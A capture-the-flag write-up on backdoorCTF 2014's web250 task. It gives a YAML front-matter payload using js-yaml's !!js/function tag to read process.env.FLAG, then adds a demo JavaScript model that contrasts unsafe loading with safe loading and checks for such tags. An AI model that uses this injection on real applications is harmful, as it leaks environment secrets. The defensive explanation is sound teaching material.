backdoorCTF 2014 - web250-1 writeup
Sunday, 23 March 2014, 03:37 AM
Here's the app's code.
Much like the web100-2 task, the goal is to inject JavaScript into the template's YAML front matter so that it runs in the Node.js global context (and can therefore read process.env).
That's not hard, just RTFM: the js-yaml documentation states that load is unsafe and should NOT be used on untrusted data (safeLoad exists for that), because the default full schema resolves JavaScript-specific tags such as !!js/function into real functions.
Let's exploit it:
---
flag: !!js/function >
  function flag() {
    return process.env.FLAG;
  }
---
{{ flag }}
and take your flag away.
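To make the mechanism concrete, here is an added example that is not part of the original writeup and does not use js-yaml itself. A tiny stand-in loader handles just enough YAML to show what the full schema does with a !!js/function scalar (the "unsafe" path, modelling load) and what a restricted schema does instead (the "safe" path, modelling safeLoad), plus the pre-check a reviewer can run on front matter before it reaches a loader. It assumes a Jekyll-style "---\n<yaml>\n---\n<template>" document, a Handlebars-like engine that invokes function-valued context entries when rendering {{ name }}, and the FLAG environment variable from the challenge; the payload is constructed to mirror the one above.

```javascript
// Added example, not code from the original writeup or from js-yaml.
// Models the bug class offline: a front-matter loader that honours the
// js-yaml-specific `!!js/function` tag turns attacker-supplied text into a
// real function, which the template engine then calls. The unsafe path
// stands in for js-yaml's load() (full schema); the safe path stands in for
// safeLoad(), which refuses such tags. Assumed document shape:
// "---\n<yaml>\n---\n<template>" with a Handlebars-like {{ name }} engine.

const FRONT_MATTER = /^---\r?\n([\s\S]*?)\r?\n---\r?\n?([\s\S]*)$/;

// Split the document into its YAML header and the template body.
function splitFrontMatter(doc) {
  const m = FRONT_MATTER.exec(doc);
  if (!m) throw new Error('no front matter found');
  return { yaml: m[1], template: m[2] };
}

// Cheap pre-check to run before handing text to a full-schema loader:
// any JavaScript-specific tag (!!js/function, !!js/regexp, ...) is a red flag.
function hasJsTags(yaml) {
  return /!!js\//.test(yaml);
}

// Minimal YAML subset: `key: scalar` and `key: !!js/function >` (or |)
// followed by an indented block. Enough to show the mechanism; not a parser.
function parseYamlSubset(yaml, { allowJsTags }) {
  const lines = yaml.split(/\r?\n/);
  const out = {};
  for (let i = 0; i < lines.length; i++) {
    const kv = /^(\w+):\s*(.*)$/.exec(lines[i]);
    if (!kv) continue;
    const [, key, rest] = kv;
    const tagged = /^!!(\S+)\s*(.*)$/.exec(rest);
    if (!tagged) { out[key] = rest; continue; }
    const [, tag, arg] = tagged;
    if (tag.startsWith('js/') && !allowJsTags) {
      throw new Error(`unsafe tag !!${tag} for key "${key}"`);
    }
    if (tag !== 'js/function') throw new Error(`tag !!${tag} is not modelled here`);
    // Gather the block scalar: every following line that is indented.
    let source = arg;
    if (arg === '>' || arg === '|') {
      const body = [];
      while (i + 1 < lines.length && /^\s+\S/.test(lines[i + 1])) body.push(lines[++i].trim());
      source = body.join(' ');
    }
    // The dangerous step: untrusted text becomes executable code. This is a
    // simplified model of what the full schema does for !!js/function.
    out[key] = new Function(`return (${source})`)();
  }
  return out;
}

// Handlebars-style lookup: a function-valued entry is called and its result printed.
function render(template, ctx) {
  return template.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, name) => {
    const v = ctx[name];
    if (typeof v === 'function') return String(v());
    return v === undefined ? '' : String(v);
  });
}

// Vulnerable pipeline: the equivalent of yaml.load() on the front matter.
function renderUnsafe(doc) {
  const { yaml, template } = splitFrontMatter(doc);
  return render(template, parseYamlSubset(yaml, { allowJsTags: true }));
}

// Hardened pipeline: the equivalent of yaml.safeLoad(); JS tags are refused.
function renderSafe(doc) {
  const { yaml, template } = splitFrontMatter(doc);
  return render(template, parseYamlSubset(yaml, { allowJsTags: false }));
}

// Constructed payload mirroring the writeup's, with the block scalar indented.
const PAYLOAD = [
  '---',
  'flag: !!js/function >',
  '  function flag() {',
  '    return process.env.FLAG;',
  '  }',
  '---',
  '{{ flag }}',
].join('\n');

// Demo: the unsafe path leaks the environment variable, the safe path refuses.
process.env.FLAG = process.env.FLAG || 'flag{constructed-for-demo}';
console.log('unsafe path:', renderUnsafe(PAYLOAD));
try { renderSafe(PAYLOAD); } catch (e) { console.log('safe path:', e.message); }
```

The point of the pre-check is that a full-schema loader has already done the damage by the time it returns: the function is created during parsing, so refusing the tags (or using the restricted schema) is the only place to stop it; inspecting the resulting object is too late.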